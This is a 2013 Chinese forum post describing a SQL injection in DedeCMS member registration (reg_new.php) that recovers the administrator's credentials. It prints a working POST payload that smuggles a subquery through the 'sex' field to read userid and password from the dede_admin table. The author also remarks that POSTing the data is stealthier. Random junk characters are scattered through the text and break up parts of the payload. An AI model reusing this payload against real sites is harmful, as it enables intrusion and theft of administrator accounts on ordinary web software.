找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2191|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞9 P# I: j' s2 s) Y% C+ y
简要描述:6 v+ N) g  M. q

- P7 I4 G6 g+ `' R- V; y需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.5 u7 x- |1 T/ J% x& x
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
- \$ D9 G- K+ o! s; g( B) R详细说明:跟这个漏洞7 {3 X) @2 }+ O5 }8 N9 F. u3 M2 R

% k5 p4 W. E1 P2 x( [  ]7 E; UWooYun: Dedecms SQL注射导致审核机制绕过漏洞' r6 p! I, F* _; J- E7 P
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.( \6 F6 D" U! m& N4 k0 t1 V
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
: [1 P7 a8 L5 N8 C. ] / o: G! X, g7 _6 e
www.political-security.com/member/reg_new.php
6 g) f! m, a' V6 l ; @& l0 m: I; l/ g  l0 {5 @
POST
; [- o5 k. l3 t
6 j* g5 |' [' N9 q; T, J, ^1 vdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&2 b* q; c' i, |0 K: D
userid=c4rp3nt3r&uname=c4rp3nt3r  Q- ?/ D; G8 [6 f: H
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
1 k9 ^' i' ~  C&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,  `) O1 R2 N3 [, F) E& i
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');) V+ t# {( d" P# y7 N$ C
%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表